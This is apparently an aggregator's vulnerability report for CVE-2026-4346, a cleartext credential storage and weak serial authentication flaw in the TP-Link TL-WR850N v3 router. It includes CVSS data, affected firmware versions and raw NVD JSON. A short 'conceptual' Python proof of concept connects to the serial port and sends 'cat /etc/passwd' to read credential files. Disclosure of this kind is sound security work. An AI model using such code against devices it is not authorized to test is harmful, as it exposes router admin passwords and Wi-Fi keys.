Security Vulnerability Report
CVE-2026-4346 CVSS 6.8 MEDIUM

CVE-2026-4346

Published: 2026-03-26 22:16:32
Last Modified: 2026-03-31 19:09:22
Source: f23511db-6c3e-4e32-a477-6aa17d310630

Description

The vulnerability affecting TL-WR850N v3 allows cleartext storage of administrative and Wi-Fi credentials in a region of the device’s flash memory while the serial interface remains enabled and protected by weak authentication. An attacker with physical access and the ability to connect to the serial port can recover sensitive information, including the router’s management password and wireless network key. Successful exploitation can lead to full administrative control of the device and unauthorized access to the associated wireless network.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:tp-link:tl-wr850n_firmware:*:*:*:*:*:*:*:* (versions before 0.9.1_Build251205) - VULNERABLE
cpe:2.3:h:tp-link:tl-wr850n:3:*:*:*:*:*:*:* - NOT VULNERABLE
TL-WR850N v3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import serial
import time

# Conceptual PoC for reading serial data
# Target: TP-Link TL-WR850N v3 Serial Interface

def exploit_serial(target_port='/dev/ttyUSB0', baud_rate=115200):
    try:
        # Connect to the serial port
        ser = serial.Serial(target_port, baud_rate, timeout=1)
        print(f"[+] Connected to {target_port} at {baud_rate} baud")

        # Wait for boot or prompt
        time.sleep(2)

        # Attempt to bypass weak auth or read memory (conceptual)
        # In a real scenario, specific commands like 'cat /etc/config/wireless' or 'printenv' would be used
        payload = b"cat /etc/passwd\n"  # Example command to read credentials
        ser.write(payload)
        time.sleep(1)

        # Read response
        while ser.in_waiting > 0:
            response = ser.readline().decode('utf-8', errors='ignore')
            if response:
                print(response.strip())

        ser.close()
        print("[+] Exploit finished.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_serial()
```

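References

https://www.tp-link.com/in/support/download/tl-wr850n/#Firmware (Product)
https://www.tp-link.com/us/support/faq/5034/ (Vendor Advisory)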

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4346", "sourceIdentifier": "f23511db-6c3e-4e32-a477-6aa17d310630", "published": "2026-03-26T22:16:31.590", "lastModified": "2026-03-31T19:09:22.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The vulnerability affecting TL-WR850N v3 allows cleartext storage of administrative and Wi-Fi credentials in a region of the device’s flash memory while the serial interface remains enabled and protected by weak authentication. An attacker with physical access and the ability to connect to the serial port can recover sensitive information, including the router’s management password and wireless network key.\n\nSuccessful exploitation can lead to full administrative control of the device and unauthorized access to the associated wireless network."}, {"lang": "es", "value": "La vulnerabilidad que afecta al TL-WR850N v3 permite el almacenamiento en texto claro de credenciales administrativas y de Wi-Fi en una región de la memoria flash del dispositivo mientras la interfaz serie permanece habilitada y protegida por una autenticación débil. 
Un atacante con acceso físico y la capacidad de conectarse al puerto serie puede recuperar información sensible, incluyendo la contraseña de administración del router y la clave de la red inalámbrica.\n\nLa explotación exitosa puede llevar al control administrativo total del dispositivo y al acceso no autorizado a la red inalámbrica asociada."}], "metrics": {"cvssMetricV40": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", 
"cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "f23511db-6c3e-4e32-a477-6aa17d310630", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tp-link:tl-wr850n_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9.1_Build251205", "matchCriteriaId": "2990864C-564D-43BB-AD09-AF5B1126D728"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tp-link:tl-wr850n:3:*:*:*:*:*:*:*", "matchCriteriaId": "FBD8E210-0D1F-46D6-9FF3-05880A8877A2"}]}]}], "references": [{"url": "https://www.tp-link.com/in/support/download/tl-wr850n/#Firmware", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Product"]}, {"url": "https://www.tp-link.com/us/support/faq/5034/", "source": "f23511db-6c3e-4e32-a477-6aa17d310630", "tags": ["Vendor Advisory"]}]}}